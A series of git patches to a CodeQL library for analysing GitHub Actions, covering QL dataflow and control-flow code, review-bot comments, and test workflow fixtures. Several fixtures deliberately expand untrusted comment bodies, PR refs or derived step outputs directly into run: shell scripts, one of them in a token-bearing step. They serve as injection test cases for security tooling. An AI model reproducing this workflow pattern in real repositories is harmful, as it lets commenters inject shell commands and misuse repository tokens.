@@ -0,0 +1,55 @@ +name: Image URL Processing + +on: + issue_comment: + types: [created] + +jobs: + process-image-url: + runs-on: ubuntu-latest + if: contains(github.event.comment.body, 'https://github.com/github/release-assets/assets/') + steps: + - name: Checkout + uses: actions/checkout@v2 + + - name: Extract and Clean Initial URL + id: extract-url + run: | + INITIAL_URL=$(echo "${{ github.event.comment.body }}" | grep -o 'https://github.com/github/release-assets/assets/[^ >]*') + echo "Cleaned Initial URL: $INITIAL_URL" + echo "::set-output name=initial_url::$INITIAL_URL" + + - name: Get Redirected URL with Debugging + id: curl + run: | + REDIRECTED_URL=$(curl -L -o /dev/null -w %{url_effective} -sS "${{ steps.extract-url.outputs.initial_url }}") + echo "Curl Command Executed" + echo "Redirected URL: $REDIRECTED_URL" + echo "::set-output name=redirected_url::$REDIRECTED_URL" + + - name: Trim URL after PNG + id: trim-url + run: | + TRIMMED_URL=$(echo "${{ steps.curl.outputs.redirected_url }}" | sed 's/\(.*\.png\).*/\1/') + echo "Trimmed URL: $TRIMMED_URL" + echo "::set-output name=trimmed_url::$TRIMMED_URL" + + - name: Output Final Trimmed URL + run: | + echo "Final Trimmed Image URL: ${{ steps.trim-url.outputs.trimmed_url }}" + + - name: Update Comment with New URL + run: | + COMMENT_URL="${{ github.event.comment.url }}" + NEW_COMMENT_BODY="Use this link to include this asset in your changelog: ${{ steps.trim-url.outputs.trimmed_url }}" + ORIGINAL_COMMENT_BODY="${{ github.event.comment.body }}" + UPDATED_COMMENT="${ORIGINAL_COMMENT_BODY} 👀 ${NEW_COMMENT_BODY}" + + PAYLOAD=$(jq -n --arg body "$UPDATED_COMMENT" '{"body": $body}') + curl -X PATCH \ + -H "Authorization: token ${{ secrets.GITHUB_TOKEN }}" \ + -H "Accept: application/vnd.github.v3+json" \ + "${COMMENT_URL}" \ + -d "$PAYLOAD" + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} 
diff --git a/ql/src/test/.github/workflows/image_link_generator_2.yml b/ql/src/test/.github/workflows/image_link_generator_2.yml
new file mode 100644
index 00000000000..01d33249251
--- /dev/null
+++ b/ql/src/test/.github/workflows/image_link_generator_2.yml
@@ -0,0 +1,61 @@ +name: Image URL Processing + +on: + issue_comment: + types: [created] + +jobs: + process-image-url: + runs-on: ubuntu-latest + if: contains(github.event.comment.body, 'https://github.com/github/release-assets/assets/') + steps: + - name: Checkout + uses: actions/checkout@v2 + + - name: Extract and Clean Initial URL + id: extract-url + env: + BODY: ${{ github.event.comment.body }} + run: | + INITIAL_URL=$(echo "$BODY" | grep -o 'https://github.com/github/release-assets/assets/[^ >]*') + echo "Cleaned Initial URL: $INITIAL_URL" + echo "::set-output name=initial_url::$INITIAL_URL" + + - name: Get Redirected URL with Debugging + id: curl + env: + INITIAL_URL: ${{ steps.extract-url.outputs.initial_url }} + run: | + REDIRECTED_URL=$(curl -L -o /dev/null -w %{url_effective} -sS "$INITIAL_URL") + echo "Curl Command Executed" + echo "Redirected URL: $REDIRECTED_URL" + echo "::set-output name=redirected_url::$REDIRECTED_URL" + + - name: Trim URL after PNG + id: trim-url + env: + REDIRECTED_URL: ${{ steps.curl.outputs.redirected_url }} + run: | + TRIMMED_URL=$(echo "$REDIRECTED_URL" | sed 's/\(.*\.png\).*/\1/') + echo "Trimmed URL: $TRIMMED_URL" + echo "::set-output name=trimmed_url::$TRIMMED_URL" + + - name: Output Final Trimmed URL + run: | + echo "Final Trimmed Image URL: ${{ steps.trim-url.outputs.trimmed_url }}" + + - name: Update Comment with New URL + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + COMMENT_URL: ${{ github.event.comment.url }} + ORIGINAL_COMMENT_BODY: ${{ github.event.comment.body }} + run: | + NEW_COMMENT_BODY="Use this link to include this asset in your changelog: ${{ steps.trim-url.outputs.trimmed_url }}" + UPDATED_COMMENT="${ORIGINAL_COMMENT_BODY} 👀 ${NEW_COMMENT_BODY}" + + PAYLOAD=$(jq -n --arg body "$UPDATED_COMMENT" '{"body": $body}') + curl -X PATCH \ + -H "Authorization: token ${{ secrets.GITHUB_TOKEN }}" \ + -H "Accept: application/vnd.github.v3+json" \ + "${COMMENT_URL}" \ + -d "$PAYLOAD" 
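Review bot: The steps "Output Final Trimmed URL" and "Update Comment with New URL" in `image_link_generator_2.yml` still expand `${{ steps.trim-url.outputs.trimmed_url }}` directly inside `run:`, although the other values were moved into `env:`. That output is derived from `github.event.comment.body` through the `extract-url`, `curl` and `trim-url` steps, so it is unclear whether this file is meant as the safe variant or as the multi-step flow case. Please state the expectation on those two steps; if they are meant to be reported, something like `# expected: reported, trimmed_url derives from comment.body via step outputs`.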
diff --git a/ql/src/test/.github/workflows/image_link_generator_3.yml b/ql/src/test/.github/workflows/image_link_generator_3.yml new file mode 100644 index 00000000000..70aece4f7cf --- /dev/null +++ b/ql/src/test/.github/workflows/image_link_generator_3.yml @@ -0,0 +1,27 @@ +name: Image URL Processing + +on: + issue_comment: + types: [created] + +jobs: + process-image-url: + runs-on: ubuntu-latest + if: contains(github.event.comment.body, 'https://github.com/github/release-assets/assets/') + steps: + - name: Checkout + uses: actions/checkout@v2 + + - name: Extract and Clean Initial URL + id: source + env: + BODY: ${{ github.event.comment.body }} + run: | + INITIAL_URL=$(echo "$BODY" | grep -o 'https://github.com/github/release-assets/assets/[^ >]*') + echo "Cleaned Initial URL: $INITIAL_URL" + echo "::set-output name=initial_url::$INITIAL_URL" + + - name: Get Redirected URL with Debugging + id: sink + run: | + echo ${{ steps.source.outputs.initial_url }} diff --git a/ql/src/test/inter1.yml b/ql/src/test/.github/workflows/inter1.yml similarity index 100% rename from ql/src/test/inter1.yml rename to ql/src/test/.github/workflows/inter1.yml diff --git a/ql/src/test/no-flow1.yml b/ql/src/test/.github/workflows/no-flow1.yml similarity index 100% rename from ql/src/test/no-flow1.yml rename to ql/src/test/.github/workflows/no-flow1.yml diff --git a/ql/src/test/no-flow2.yml b/ql/src/test/.github/workflows/no-flow2.yml similarity index 100% rename from ql/src/test/no-flow2.yml rename to ql/src/test/.github/workflows/no-flow2.yml diff --git a/ql/src/test/simple1.yml b/ql/src/test/.github/workflows/simple1.yml similarity index 100% rename from ql/src/test/simple1.yml rename to ql/src/test/.github/workflows/simple1.yml diff --git a/ql/src/test/simple2.yml b/ql/src/test/.github/workflows/simple2.yml similarity index 100% rename from ql/src/test/simple2.yml rename to ql/src/test/.github/workflows/simple2.yml 
diff --git a/ql/src/test/test.yml b/ql/src/test/.github/workflows/test.yml similarity index 100% rename from ql/src/test/test.yml rename to ql/src/test/.github/workflows/test.yml From 83ca36bc76ff38f99be4c14a2f07a69b0ab021b5 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 8 Feb 2024 11:56:22 +0100 Subject: [PATCH 0011/1267] Support RunExpr's env vars --- ql/lib/codeql/actions/Ast.qll | 8 +++++ .../actions/controlflow/internal/Cfg.qll | 14 ++++++-- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 32 +++++++++++++++++++ .../dataflow/internal/DataFlowPrivate.qll | 15 +++++++-- 4 files changed, 65 insertions(+), 4 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index d2c7fdd4501..d9306b53815 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -169,6 +169,13 @@ class RunExpr extends StepStmt, Expression { Expression getScriptExpr() { result = scriptExpr } + Expression getEnvExpr(string name) { + exists(Actions::StepEnv env | + env.getStep() = this and + env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) + ) + } + string getScript() { result = scriptExpr.getValue() } } @@ -183,6 +190,7 @@ class ExprAccessExpr extends Expression instanceof YamlString { string getExpression() { result = expr } JobStmt getJob() { result.getAChildNode*() = this } + //override string toString() { result = expr } } /** diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index c549eb40198..a2ebb10219e 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll 
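Review bot: `RunExpr.getEnvExpr` looks only at `Actions::StepEnv`. Judging by the name (the class is defined outside this patch), an `env:` mapping declared on the job or at workflow level is not returned, so a `run:` script reading such a variable gets no env-to-script taint step. Either extend the lookup to the enclosing job and workflow `env` mappings or state the limit in QLDoc, e.g. `/** Gets the step-level env expression for name; job- and workflow-level env are not considered. */`. The second hunk of this file adds a commented-out `toString` override to `ExprAccessExpr`, and the `RunTree` hunk in `Cfg.qll` leaves the old `getChildNode` behind as a comment; both should be deleted rather than commented out.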
@@ -171,8 +171,18 @@ private class UsesTree extends StandardPreOrderTree instanceof UsesExpr { } private class RunTree extends StandardPreOrderTree instanceof RunExpr { - override ControlFlowTree getChildNode(int i) { result = super.getScriptExpr() and i = 0 } + //override ControlFlowTree getChildNode(int i) { result = super.getScriptExpr() and i = 0 } + override ControlFlowTree getChildNode(int i) { + result = + rank[i](Expression child, Location l | + (child = super.getEnvExpr(_) or child = super.getScriptExpr()) and + l = child.getLocation() + | + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() + ) + } } private class ExprAccessTree extends LeafTree instanceof ExprAccessExpr { } - diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 528f9e54832..223ff305ba4 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -20,6 +20,9 @@ class AdditionalTaintStep extends Unit { abstract predicate step(DataFlow::Node node1, DataFlow::Node node2); } +/** + * Holds if actions-find-and-replace-string step is used. + */ private class ActionsFindAndReplaceStringStep extends AdditionalTaintStep { override predicate step(DataFlow::Node pred, DataFlow::Node succ) { exists(UsesExpr u | 
@@ -29,3 +32,32 @@ private class ActionsFindAndReplaceStringStep extends AdditionalTaintStep { ) } } + +/** + * Holds if a Run step declares an environment variable, uses it in its script and sets an output in its script. + * e.g. + * - name: Extract and Clean Initial URL + * id: extract-url + * env: + * BODY: ${{ github.event.comment.body }} + * run: | + * INITIAL_URL=$(echo "$BODY" | grep -o 'https://github.com/github/release-assets/assets/[^ >]*') + * echo "Cleaned Initial URL: $INITIAL_URL" + * echo "::set-output name=initial_url::$INITIAL_URL" + */ +private class RunEnvToScriptStep extends AdditionalTaintStep { + override predicate step(DataFlow::Node pred, DataFlow::Node succ) { test(pred, succ) } +} + +predicate test(DataFlow::Node pred, DataFlow::Node succ) { + exists(RunExpr r, string varName | + r.getEnvExpr(varName) = pred.asExpr() and + exists(string script, string line | + script = r.getScript() and + line = script.splitAt("\n") and + line.regexpMatch(".*::set-output\\s+name.*") and + script.indexOf("$" + ["", "{", "ENV{"] + varName) > 0 + ) and + succ.asExpr() = r + ) +} diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 9f028623848..534eb4fe657 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -197,7 +197,7 @@ predicate parameterMatch(ParameterPosition ppos, ArgumentPosition apos) { ppos = */ predicate simpleLocalFlowStep(Node nodeFrom, Node nodeTo) { localFlowStep(nodeFrom, nodeTo) } -predicate stepOutputDefToUse(Node nodeFrom, Node nodeTo) { +predicate usesOutputDefToUse(Node nodeFrom, Node nodeTo) { // nodeTo is an OutputVarAccessExpr scoped with the namespace of the nodeFrom Step output exists(UsesExpr uses, StepOutputAccessExpr outputRead | uses = nodeFrom.asExpr() and 
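Review bot: The predicate `test` behind `RunEnvToScriptStep` misses cases it should cover. `script.indexOf(...) > 0` rejects a use at offset 0 and should read `script.indexOf("$" + ["", "{", "ENV{"] + varName) >= 0`. The line test `.*::set-output\\s+name.*` recognises only the `::set-output` workflow command, so a step that writes its outputs to the `GITHUB_OUTPUT` file gets no taint step and its outputs are treated as clean. The variable use is also not tied to the line that sets the output, and `indexOf` is a substring search, so `$BODY` also matches `$BODY_LEN`; that over-approximation is acceptable for taint but should be stated in the QLDoc. The predicate is public with a generic name; `private predicate runEnvToOutputStep(DataFlow::Node pred, DataFlow::Node succ)` would keep it out of the library's exported names.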
@@ -207,6 +207,16 @@ predicate stepOutputDefToUse(Node nodeFrom, Node nodeTo) { ) } +predicate runOutputDefToUse(Node nodeFrom, Node nodeTo) { + // nodeTo is an OutputVarAccessExpr scoped with the namespace of the nodeFrom Step output + exists(RunExpr uses, StepOutputAccessExpr outputRead | + uses = nodeFrom.asExpr() and + outputRead = nodeTo.asExpr() and + outputRead.getStepId() = uses.getId() and + uses.getJob() = outputRead.getJob() + ) +} + predicate jobOutputDefToUse(Node nodeFrom, Node nodeTo) { // nodeTo is a JobOutputAccessExpr and nodeFrom is the Job output expression exists(Expression astFrom, JobOutputAccessExpr astTo | @@ -223,7 +233,8 @@ predicate jobOutputDefToUse(Node nodeFrom, Node nodeTo) { */ pragma[nomagic] predicate localFlowStep(Node nodeFrom, Node nodeTo) { - stepOutputDefToUse(nodeFrom, nodeTo) or + usesOutputDefToUse(nodeFrom, nodeTo) or + runOutputDefToUse(nodeFrom, nodeTo) or jobOutputDefToUse(nodeFrom, nodeTo) } From 5006ffe20338f5355fdb578527b06acfa04f3285 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 8 Feb 2024 12:01:41 +0100 Subject: [PATCH 0012/1267] Use the LibYaml default AST hierarchy --- ql/lib/codeql/actions/Ast.qll | 37 +---------------------------------- 1 file changed, 1 insertion(+), 36 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index d9306b53815..96a8a2a7f14 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll 
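Review bot: `runOutputDefToUse` links a `RunExpr` to every `StepOutputAccessExpr` with the same step id and job, without comparing the output name. Once `RunEnvToScriptStep` taints the step, all of its outputs therefore count as tainted. That is a defensible over-approximation, but the comment does not say so: it is copied from the `uses` variant, still speaks of `OutputVarAccessExpr`, and the `RunExpr` variable is named `uses`. Suggested: `// Any output of the run step is treated as derived from the step; output names are not tracked.` and `exists(RunExpr run, StepOutputAccessExpr outputRead |`.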
@@ -2,48 +2,13 @@ private import codeql.actions.ast.internal.Actions private import codeql.Locations /** - * Base class for the AST tree. - * Based on YamlNode from the Yaml library but making mapping values children of the mapping keys: - * eg: top: - * key: value - * According to the Yaml library, both `key` and `value` are direct children of `top` - * This Tree implementation makes `key` child od `top` and `value` child of `key` + * Base class for the AST tree. Based on YamlNode from the Yaml library. */ class AstNode instanceof YamlNode { AstNode getParentNode() { result = super.getParentNode() } - // AstNode getParentNode() { - // if exists(YamlMapping m | m.maps(_, this)) - // then exists(YamlMapping m | m.maps(result, this)) - // else result = super.getParentNode() - // } AstNode getAChildNode() { result = super.getAChildNode() } - // AstNode getAChildNode() { - // if this instanceof YamlMapping - // then this.(YamlMapping).maps(result, _) - // else - // if this instanceof YamlCollection - // then result = super.getChildNode(_) - // else - // if this instanceof YamlScalar and exists(YamlMapping m | m.maps(this, _)) - // then exists(YamlMapping m | m.maps(this, result)) - // else none() - // } - // /** - // * This should be getAChildNode(int i) - // */ - // AstNode getChildNodeByOrder(int i) { - // result = - // rank[i](Expression child, Location l | - // child = this.getAChildNode() and - // child.getLocation() = l - // | - // child - // order by - // l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() - // ) - // } string toString() { result = super.toString() } string getAPrimaryQlClass() { result = super.getAPrimaryQlClass() } From db413361f78c836c190b112dafbbc1a1991dff52 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 8 Feb 2024 15:11:39 +0100 Subject: [PATCH 0013/1267] Add Reusable Workflow test --- .../.github/workflows/calling_workflow.yml | 18 ++++++++++++++++++ .../.github/workflows/reusable_workflow.yml | 18 ++++++++++++++++++ 2 files changed, 36 insertions(+) create mode 100644 ql/lib/test/.github/workflows/calling_workflow.yml create mode 100644 ql/lib/test/.github/workflows/reusable_workflow.yml diff --git a/ql/lib/test/.github/workflows/calling_workflow.yml b/ql/lib/test/.github/workflows/calling_workflow.yml new file mode 100644 index 00000000000..3b0ab8f18d3 --- /dev/null +++ b/ql/lib/test/.github/workflows/calling_workflow.yml @@ -0,0 +1,18 @@ +on: push + +jobs: + call-workflow-1-in-local-repo: + uses: octo-org/this-repo/.github/workflows/reusable_workflow.yml@172239021f7ba04fe7327647b213799853a9eb89 + with: + config-path: ${{ github.event.pull_request.head.ref }} + secrets: inherit + call-workflow-2-in-local-repo: + uses: ./.github/workflows/reusable_workflow.yml + with: + config-path: ${{ github.event.pull_request.head.ref }} + secrets: inherit + call-workflow-in-another-repo: + uses: octo-org/another-repo/.github/workflows/workflow.yml@v1 + with: + config-path: ${{ github.event.pull_request.head.ref }} + secrets: inherit diff --git a/ql/lib/test/.github/workflows/reusable_workflow.yml b/ql/lib/test/.github/workflows/reusable_workflow.yml new file mode 100644 index 00000000000..f31c8a63d74 --- /dev/null +++ b/ql/lib/test/.github/workflows/reusable_workflow.yml @@ -0,0 +1,18 @@ +name: Reusable workflow example + +on: + workflow_call: + inputs: + config-path: + required: true + type: string + secrets: + token: + required: true + +jobs: + triage: + runs-on: ubuntu-latest + steps: + - id: sink + run: echo ${{ inputs.config-path }} From 9659098ab6745ff95c14ae0683423b1c18971408 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 8 Feb 2024 15:40:06 +0100 Subject: [PATCH 0014/1267] Support for Reusable workflows --- ql/lib/codeql/actions/Ast.qll | 114 +++++++++++++++++- .../actions/controlflow/internal/Cfg.qll | 48 +++++++- .../dataflow/internal/DataFlowPrivate.qll | 76 +++++++----- ql/lib/test/.github/workflows/test.yml | 10 +- ql/lib/test/test.ql | 19 ++- 5 files changed, 217 insertions(+), 50 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 96a8a2a7f14..8f8347e766f 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -34,8 +34,51 @@ class WorkflowStmt extends Statement instanceof Actions::Workflow { JobStmt getAJob() { result = super.getJob(_) } JobStmt getJob(string id) { result = super.getJob(id) } + + predicate isReusable() { this instanceof ReusableWorkflowStmt } } +class ReusableWorkflowStmt extends WorkflowStmt { + YamlMapping parameters; + + ReusableWorkflowStmt() { + exists(Actions::On on | + on.getWorkflow() = this and + on.getNode("workflow_call").(YamlMapping).lookup("inputs") = parameters + ) + } + + ParamsStmt getParams() { result = parameters } + + // TODO: implemnt callable name + string getName() { result = this.getLocation().getFile().getRelativePath() } +} + +class ParamsStmt extends Statement instanceof YamlMapping { + ParamsStmt() { + exists(Actions::On on | on.getNode("workflow_call").(YamlMapping).lookup("inputs") = this) + } + + /** + * Gets a specific parameter expression (YamlMapping) by name. + * eg: + * on: + * workflow_call: + * inputs: + * config-path: + * required: true + * type: string + * secrets: + * token: + * required: true + */ + ParamExpr getParamExpr(string name) { + this.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) + } +} + +class ParamExpr extends Expression instanceof YamlValue { } + /** * A Job is a collection of steps that run in an execution environment. */ 
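Review bot: `ReusableWorkflowStmt` is defined by the presence of `on.workflow_call.inputs`, so a workflow that declares `workflow_call` without an `inputs` mapping is not a `ReusableWorkflowStmt` and `isReusable()` does not hold for it. If that is intended because only inputs matter for data flow, document it on the class, e.g. `/** A workflow triggered by workflow_call that declares inputs. */`. Otherwise key the class on the `workflow_call` node and let `getParams()` have no result. The QLDoc example on `getParamExpr` also shows a `secrets:` block although only `inputs` entries are returned, and the `TODO` on `getName()` has a typo (`implemnt`).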
@@ -71,6 +114,11 @@ class JobStmt extends Statement instanceof Actions::Job { * out2: ${steps.foo.baz} */ JobOutputStmt getOutputStmt() { result = this.(Actions::Job).lookup("outputs") } + + /** + * Reusable workflow jobs may have Uses children + */ + JobUsesExpr getUsesExpr() { result = this.(Actions::Job).lookup("uses") } } /** @@ -104,19 +152,27 @@ class StepStmt extends Statement instanceof Actions::Step { JobStmt getJob() { result = super.getJob() } } +abstract class UsesExpr extends Expression { + abstract string getTarget(); + + abstract string getVersion(); + + abstract Expression getArgument(string key); +} + /** * A Uses step represents a call to an action that is defined in a GitHub repository. */ -class UsesExpr extends StepStmt, Expression { +class StepUsesExpr extends StepStmt, UsesExpr { Actions::Uses uses; - UsesExpr() { uses.getStep() = this } + StepUsesExpr() { uses.getStep() = this } - string getTarget() { result = uses.getGitHubRepository() } + override string getTarget() { result = uses.getGitHubRepository() } - string getVersion() { result = uses.getVersion() } + override string getVersion() { result = uses.getVersion() } - Expression getArgument(string key) { + override Expression getArgument(string key) { exists(Actions::With with | with.getStep() = this and result = with.lookup(key) 
@@ -124,6 +180,54 @@ class UsesExpr extends StepStmt, Expression { } } +/** + * A Uses step represents a call to an action that is defined in a GitHub repository. + */ +class JobUsesExpr extends UsesExpr instanceof YamlScalar { + JobStmt job; + + JobUsesExpr() { job.(YamlMapping).lookup("uses") = this } + + JobStmt getJob() { result = job } + + /** + * Gets a regular expression that parses an `owner/repo@version` reference within a `uses` field in an Actions job step. + * local repo: octo-org/this-repo/.github/workflows/workflow-1.yml@172239021f7ba04fe7327647b213799853a9eb89 + * local repo: ./.github/workflows/workflow-2.yml + * remote repo: octo-org/another-repo/.github/workflows/workflow.yml@v1 + */ + private string repoUsesParser() { result = "([^/]+)/([^/]+)/([^@]+)@(.+)" } + + private string pathUsesParser() { result = "\\./(.+)" } + + override string getTarget() { + exists(string name | + this.(YamlScalar).getValue() = name and + if name.matches("./%") + then result = name.regexpCapture(this.pathUsesParser(), 1) + else + result = + name.regexpCapture(this.repoUsesParser(), 1) + "/" + + name.regexpCapture(this.repoUsesParser(), 2) + "/" + + name.regexpCapture(this.repoUsesParser(), 3) + ) + } + + /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ + override string getVersion() { + exists(string name | + this.(YamlScalar).getValue() = name and + if not name.matches("\\.%") + then result = this.(YamlScalar).getValue().regexpCapture(this.repoUsesParser(), 4) + else none() + ) + } + + override Expression getArgument(string key) { + job.(YamlMapping).lookup("with").(YamlMapping).lookup(key) = result + } +} + /** * A Run step represents the evaluation of a provided script */ diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index a2ebb10219e..ac8ab616e3e 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll 
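Review bot: The QLDoc on `JobUsesExpr` is copied from the step class ("A Uses step represents a call to an action…"), although this class models a job-level `uses:` that calls a reusable workflow. `getTarget` and `getVersion` also detect a local path in two different ways, `name.matches("./%")` versus `not name.matches("\\.%")`, and the `if … else none()` in `getVersion` adds nothing. I would write the doc as `/** A job-level uses: that calls a reusable workflow. */` and reduce `getVersion` to `result = this.(YamlScalar).getValue().regexpCapture(this.repoUsesParser(), 4)`. That already has no result for the `./` form used in the fixtures, since that form has no `@`.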
+++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll @@ -87,6 +87,8 @@ module Completion { module CfgScope { abstract class CfgScope extends AstNode { } + private class ReusableWorkflowScope extends CfgScope instanceof ReusableWorkflowStmt { } + private class JobScope extends CfgScope instanceof JobStmt { } } @@ -120,9 +122,15 @@ private module Implementation implements CfgShared::InputSig { int maxSplits() { result = 0 } - predicate scopeFirst(CfgScope scope, AstNode e) { first(scope.(JobStmt), e) } + predicate scopeFirst(CfgScope scope, AstNode e) { + first(scope.(ReusableWorkflowStmt).getParams(), e) or + first(scope.(JobStmt), e) + } - predicate scopeLast(CfgScope scope, AstNode e, Completion c) { last(scope.(JobStmt), e, c) } + predicate scopeLast(CfgScope scope, AstNode e, Completion c) { + last(scope.(ReusableWorkflowStmt), e, c) or + last(scope.(JobStmt), e, c) + } predicate successorTypeIsSimple(SuccessorType t) { t instanceof NormalSuccessor } 
@@ -139,11 +147,30 @@ private import CfgImpl private import Completion private import CfgScope +private class ReusableWorkflowTree extends StandardPreOrderTree instanceof ReusableWorkflowStmt { + override ControlFlowTree getChildNode(int i) { result = super.getParams() and i = 0 } +} + +private class ReusableWorkflowParamsTree extends StandardPreOrderTree instanceof ParamsStmt { + override ControlFlowTree getChildNode(int i) { + result = + rank[i](Expression child, Location l | + child = super.getParamExpr(_) and l = child.getLocation() + | + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() + ) + } +} + +private class ParamExprTree extends LeafTree instanceof ParamExpr { } + private class JobTree extends StandardPreOrderTree instanceof JobStmt { override ControlFlowTree getChildNode(int i) { result = rank[i](Expression child, Location l | - (child = super.getAStep() or child = super.getOutputStmt()) and + (child = super.getAStep() or child = super.getOutputStmt() or child = super.getUsesExpr()) and l = child.getLocation() | child @@ -157,7 +184,20 @@ private class JobOutputTree extends StandardPreOrderTree instanceof JobOutputStm override ControlFlowTree getChildNode(int i) { result = super.asYamlMapping().getValueNode(i) } } -private class UsesTree extends StandardPreOrderTree instanceof UsesExpr { +private class StepUsesTree extends StandardPreOrderTree instanceof StepUsesExpr { + override ControlFlowTree getChildNode(int i) { + result = + rank[i](Expression child, Location l | + child = super.getArgument(_) and l = child.getLocation() + | + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() + ) + } +} + +private class JobUsesTree extends StandardPreOrderTree instanceof JobUsesExpr { override ControlFlowTree getChildNode(int i) { result = rank[i](Expression child, Location l | 
diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 534eb4fe657..1e6fbd5b854 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -6,17 +6,32 @@ private import codeql.actions.controlflow.BasicBlocks private import DataFlowPublic cached -newtype TNode = TExprNode(DataFlowExpr e) +newtype TNode = + TExprNode(DataFlowExpr e) or + TParameterNode(ParamExpr p) { p = any(ReusableWorkflowStmt w).getParams().getParamExpr(_) } or + TReturningNode(Cfg::Node n) { n.getAstNode() = any(JobStmt j).getOutputStmt().getOutputExpr(_) } /** - * Not used + * Reusable workflow input nodes */ -class ParameterNode extends Node { - ParameterNode() { none() } +class ParameterNode extends Node, TParameterNode { + private ParamExpr parameter; + + ParameterNode() { this = TParameterNode(parameter) } + + predicate isParameterOf(DataFlowCallable c, ParameterPosition pos) { + parameter = c.(ReusableWorkflowStmt).getParams().getParamExpr(pos) + } + + override string toString() { result = parameter.toString() } + + override Location getLocation() { result = parameter.getLocation() } + + ParamExpr getParameter() { result = parameter } } /** - * Not used + * Reusable workflow output nodes */ class ReturnNode extends Node { ReturnNode() { none() } @@ -35,17 +50,25 @@ class OutNode extends ExprNode { } } +/** + * Not used + */ class CastNode extends Node { CastNode() { none() } } +/** + * Not used + */ class PostUpdateNode extends Node { PostUpdateNode() { none() } Node getPreUpdateNode() { none() } } -predicate isParameterNode(ParameterNode p, DataFlowCallable c, ParameterPosition pos) { none() } +predicate isParameterNode(ParameterNode p, DataFlowCallable c, ParameterPosition pos) { + p.isParameterOf(c, pos) +} predicate isArgumentNode(ArgumentNode arg, DataFlowCall call, ArgumentPosition pos) { arg.argumentOf(call, pos) 
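Review bot: The `TNode` hunk adds a `TReturningNode` branch and retitles `ReturnNode` as "Reusable workflow output nodes", but `ReturnNode`'s characteristic predicate is still `none()` and no class in this hunk wraps `TReturningNode`. The new branch therefore creates node values that nothing here describes; no `toString` or `getLocation` for them is visible, and `Node` itself lives in `DataFlowPublic.qll`. Values leaving a reusable workflow through job outputs are also not modelled as returns. Either drop the branch until outputs are supported, or add the wrapping class and mark the gap: `// TODO: ReturnNode is still empty; reusable-workflow outputs do not flow back to the caller.`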
@@ -64,7 +87,7 @@ class DataFlowExpr extends Cfg::Node { } /** - * A call corresponds to a Uses steps where a 3rd party action gets called + * A call corresponds to a Uses steps where a 3rd party action or a reusable workflow gets called */ class DataFlowCall instanceof Cfg::Node { DataFlowCall() { super.getAstNode() instanceof UsesExpr } @@ -79,27 +102,16 @@ class DataFlowCall instanceof Cfg::Node { DataFlowCallable getEnclosingCallable() { result = super.getScope() } } -// class DataFlowCallable instanceof Cfg::CfgScope { -// DataFlowCallable() { none() } -// -// string toString() { result = super.toString() } -// -// string getName() { result = "none" } -// } /** * A Cfg scope that can be called - * There are no callables in Actions, at least not in the AST + * ReusableWorkflowStmt */ -class DataFlowCallable instanceof Cfg::CfgScope { +class DataFlowCallable instanceof ReusableWorkflowStmt { string toString() { result = super.toString() } Location getLocation() { result = super.getLocation() } - string getName() { - if this instanceof StepStmt - then result = this.(StepStmt).getId() - else result = this.(JobStmt).getId() - } + string getName() { result = super.getName() } } newtype TReturnKind = TNormalReturn() @@ -114,7 +126,7 @@ class NormalReturn extends ReturnKind, TNormalReturn { } /** Gets a viable implementation of the target of the given `Call`. */ -DataFlowCallable viableCallable(DataFlowCall c) { none() } +DataFlowCallable viableCallable(DataFlowCall c) { c.getName() = result.getName() } // /** // * Holds if the set of viable implementations that can be called by `call` 
